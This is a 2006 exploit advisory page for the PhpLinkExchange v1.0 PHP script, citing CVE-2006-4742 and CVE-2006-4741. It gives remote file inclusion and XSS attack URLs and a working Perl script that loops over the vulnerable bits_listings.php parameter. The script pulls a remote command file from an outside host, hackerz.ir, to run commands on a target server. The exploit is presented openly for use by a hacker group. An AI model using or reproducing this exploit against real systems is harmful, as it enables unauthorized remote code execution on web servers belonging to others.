PhpLinkExchange v1.0 RFI + RC + Xss [RC-exploit]

2006.09.18
Credit: s3rv3r_hack3r
Risk: High
Local: No
Remote: Yes
CVE: CVE-2006-4742 | CVE-2006-4741
CWE: CWE-98

vendor :www.idevspot.com Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange By : s3rv3r_hack3r www: hackerz.ir & h4ckerz.com remote file include : http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart =[shell.txt?] xss: http://www.domain.com/PhpLinkExchange/user_add.php?msg=[xss] remote command Exploit : #!/usr/bin/perl # # Exploit by s3rv3r_hack3r ###################################################### # ___ ___ __ # # / | \_____ ____ | | __ ___________________ # #/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / # #\ Y // __ \\ \___| <\ ___/| | \// / # # \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ # # \/ \/ \/ \/ \/ \/ # # Iran Hackerz Security Team # # WebSite: www.hackerz.ir & www.h4ckerz.com ###################################################### use LWP::Simple; print "-------------------------------------------\n"; print "= Iran hacekerz security team =\n"; print "= By s3rv3r_hack3r - www.hackerz.ir =\n"; print "-------------------------------------------\n\n"; print "Target >http://"; chomp($targ = <STDIN>); print "your web site name >"; chomp($cmd= <STDIN>); $con=get("http://".$targ."/bits_listings.php") || die "[-]Cannot connect to Host"; while () { print "command\$"; chomp($cmd=<STDIN>); $commd=get("http://".$targ."/bits_listings.php?svr_rootPhpStart=http://w ww.hackerz.ir/cmd.txt?cmd=".$cmd) } +++++


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top